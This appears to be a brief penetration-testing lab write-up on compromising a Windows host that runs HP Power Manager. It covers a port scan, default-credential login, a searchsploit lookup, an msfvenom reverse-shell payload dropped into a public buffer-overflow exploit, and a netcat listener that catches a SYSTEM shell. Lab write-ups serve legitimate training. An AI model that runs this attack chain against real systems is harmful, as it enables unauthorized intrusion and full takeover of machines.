NMAP SCAN
=====================
$ nmap -p- --min-rate=10000 192.168.53.45
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
3573/tcp  open  tag-ups-1
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49157/tcp open  unknown
49159/tcp open  unknown
49160/tcp open  unknown

Visit the website
=====================
I was able to login with admin:admin
I am greeted with HP power manager portal.
I run searchsploit for that and find below bof:
# searchsploit hp power manager
------------------------------------------- ---------------------------------
 Exploit Title                             |  Path
------------------------------------------- ---------------------------------
Flying Dog Software Powerslave 4.3 Portalm | php/webapps/23163.txt
Hewlett-Packard (HP) Power Manager Adminis | windows/remote/10099.py
Hewlett-Packard (HP) Power Manager Adminis | windows/remote/16785.rb
HP Power Manager - 'formExportDataLogs' Re | cgi/remote/18015.rb
------------------------------------------- ---------------------------------

Next is to generate a reverse shell code:
# msfvenom -p windows/shell_reverse_tcp -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" LHOST=192.168.53.200 LPORT=80 -e x86/alpha_mixed -f c

And replace that on the 10099.py script

Onwards, it's just to run the script and get a reverse shell back as administrator.
$ python2 10099.py 192.168.53.45
# nc -lvnp 80                            
listening on [any] 80 ...
connect to [192.168.53.200] from (UNKNOWN) [192.168.53.45] 49177
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

The box is rooted!
